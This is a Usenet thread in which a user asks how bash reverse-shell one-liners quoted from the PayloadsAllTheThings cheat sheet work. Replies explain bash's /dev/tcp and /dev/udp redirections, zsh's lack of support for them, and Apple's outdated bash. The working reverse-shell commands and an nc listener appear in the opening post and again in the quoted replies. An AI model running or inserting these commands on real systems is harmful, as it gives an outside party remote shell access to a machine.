Reverse tcp/udp Shell with bash.
hongy...@gmail.com
2021-03-05 01:57:31 UTC
On this webpage <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>, I noticed the following methods to get a reverse tcp/udp shell with bash:

<quote>
Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

Bash UDP

Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242
</quote>

I am trying to understand the mechanism of the above code but am still not quite clear about the communication process. OTOH, why is nc used for the UDP case, whereas the method for the TCP case is implemented purely with I/O redirection?

Regards,
HY
Luuk
2021-03-05 16:55:20 UTC
Post by ***@gmail.com
On this webpage <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>, I noticed the following methods to get the reverse shell of tcp/udp with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242
</quote>
I am trying to understand the mechanism of the above code but am still not quite clear about the communication process. OTOH, why is nc used for the UDP case, whereas the method for the TCP case is implemented purely with I/O redirection?
Regards,
HY
% sh -i >& /dev/udp/10.0.0.1/4242 0>&1
zsh: no such file or directory: /dev/udp/10.0.0.1/4242
--
Luuk
Lew Pitcher
2021-03-05 17:52:24 UTC
Post by ***@gmail.com
Post by ***@gmail.com
On this webpage
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>,
I noticed the following methods to get a reverse tcp/udp shell
with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242
</quote>
I am trying to understand the mechanism of the above code but am
still not quite clear about the communication process. OTOH, why is
nc used for the UDP case, whereas the method for the TCP case is
implemented purely with I/O redirection?
Regards,
HY
/dev/udp/10.0.0.1/4242
From bash(1) manpage:

Bash handles several filenames specially when they are used in
redirections, as described in the following table

...

/dev/tcp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding TCP socket.

/dev/udp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding UDP socket.

AFAICT, zsh does not support this form of redirection.
--
Lew Pitcher
"In Skills, We Trust"
Luuk
2021-03-10 08:57:26 UTC
Post by ***@gmail.com
Post by ***@gmail.com
Post by ***@gmail.com
On this webpage
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>,
I noticed the following methods to get a reverse tcp/udp shell
with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242
</quote>
I am trying to understand the mechanism of the above code but am
still not quite clear about the communication process. OTOH, why is
nc used for the UDP case, whereas the method for the TCP case is
implemented purely with I/O redirection?
Regards,
HY
/dev/udp/10.0.0.1/4242
Bash handles several filenames specially when they are used in
redirections, as described in the following table
...
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding TCP socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding UDP socket.
AFAICT, zsh does not support this form of redirection.
Or, Apple does not support it, and has a bad implementation of bash.

% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
--
Luuk
Barry Margolin
2021-03-13 06:47:42 UTC
Post by Luuk
Or, Apple does not support it, and has a bad implementation of bash.
% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
IIRC, Apple stopped updating GNU applications to versions that were
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
--
Barry Margolin, ***@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
Ottavio Caruso
2021-03-13 09:44:14 UTC
Post by Barry Margolin
Post by Luuk
Or, Apple does not support it, and has a bad implementation of bash.
% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
IIRC, Apple stopped updating GNU applications to versions that were
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
You can always (re)compile bash on Darwin with pkgsrc. It's well
supported and I believe one NetBSD developer also provides ready made
binaries. I can investigate the matter, if needed. I haven't got the
links to the binaries right now.
--
Ottavio Caruso